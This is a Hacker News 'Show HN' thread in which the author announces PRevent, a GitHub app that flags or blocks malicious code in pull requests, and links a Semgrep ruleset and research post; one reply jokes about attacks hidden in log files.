Hacker News new | past | comments | ask | show | jobs | submit login
Show HN: I built a PR listener and ruleset to detect malicious code in CI/CD (github.com/apiiro)
13 points by mgiladi 2 days ago | hide | past | favorite | 1 comment
I built a GitHub app that detects it in pull requests, notifies or blocks them. Alongside it, I published a Semgrep ruleset for any stage of the CI/CD.

I started this after getting frustrated by all the FUD around malicious code - lots of noise, little effort to solve it. Having said that, it's still a major attack vector - a stored RCE, with the codebase itself as the sink.

Feedback is appreciated.

The app, PRevent - https://github.com/apiiro/PRevent

The ruleset: https://github.com/apiiro/malicious-code-ruleset

The research: https://apiiro.com/blog/guard-your-codebase-practical-steps-...






> getting frustrated by all the FUD around malicious code - lots of noise, little effort to solve it

You should be worried about your logs too :) Dare you to `sudo cat logs.txt`

https://www.youtube.com/watch?v=3T2Al3jdY38

reply




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: